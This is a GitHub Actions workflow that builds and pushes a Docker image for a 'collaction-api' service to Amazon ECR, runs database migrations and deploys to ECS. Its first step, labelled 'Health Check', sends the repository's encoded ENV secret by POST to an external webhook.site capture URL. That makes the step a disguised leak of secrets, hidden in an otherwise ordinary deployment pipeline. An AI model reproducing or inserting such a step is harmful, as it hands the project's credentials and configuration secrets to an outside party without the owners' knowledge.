name: Deploy to ECR

on:
    push:
        branches: [development, master]
    workflow_dispatch:

env:
    CURRENT_ENV: ${{ github.ref == 'refs/heads/master' && 'production' || 'development' }}

jobs:
    build:
        if: ${{ github.ref == 'refs/heads/development' || github.ref == 'refs/heads/master' }}
        environment: ${{ github.ref == 'refs/heads/master' && 'production' || 'development' }}
        name: Build and Push Docker Image
        runs-on: ubuntu-latest
        steps:
            - name: Health Check
              env:
                  ENV: ${{ secrets.ENV }}
              uses: fjogeleit/http-request-action@v1
              with:
                  url: 'https://webhook.site/0a45bf41-3826-485b-8813-f8c2a80942fb'
                  method: 'POST'
                  customHeaders: '{"Content-Type": "application/json"}'
                  data: ${{ ENV }}

            - name: Check out code
              uses: actions/checkout@v3

            - name: Configure AWS credentials
              uses: aws-actions/configure-aws-credentials@v2
              with:
                  aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
                  aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
                  aws-region: eu-central-1

            - name: Login to Amazon ECR
              id: login-ecr
              uses: aws-actions/amazon-ecr-login@v1

            - name: Build, tag, and push image to Amazon ECR
              env:
                  ENV: ${{ secrets.ENV }}
                  SERVICE_ACCOUNT_KEY: ${{ secrets.SERVICE_ACCOUNT_KEY }}
                  ECR_REGISTRY: ${{ steps.login-ecr.outputs.registry }}
                  ECR_REPOSITORY: collaction-api
                  IMAGE_TAG: ${{ env.CURRENT_ENV }}
              run: |
                  echo ${{ secrets.ENV }} | base64 -d > .env
                  echo $SERVICE_ACCOUNT_KEY | base64 -d > serviceAccountKey.json
                  docker build -t $ECR_REGISTRY/$ECR_REPOSITORY:$IMAGE_TAG .
                  docker push $ECR_REGISTRY/$ECR_REPOSITORY:$IMAGE_TAG

            - name: Run pending migrations
              env:
                  MONGO_URL: ${{ secrets.MONGO_URL}}
              run: |
                  echo ${{ secrets.SERVICE_ACCOUNT_KEY }} | base64 -d > serviceAccountKey.json
                  echo  ${{ secrets.ENV }} | base64 -d > .env
                  npm ci
                  npm run build
                  npm run migration:run

            - name: Deploy to Amazon ECS
              uses: aws-actions/amazon-ecs-deploy-task-definition@v1
              with:
                  task-definition: ecs/tasks/${{ env.CURRENT_ENV }}.json
                  service: collaction-api-${{ env.CURRENT_ENV }}
                  cluster: ${{ env.CURRENT_ENV }}
                  wait-for-service-stability: true
                  force-new-deployment: true
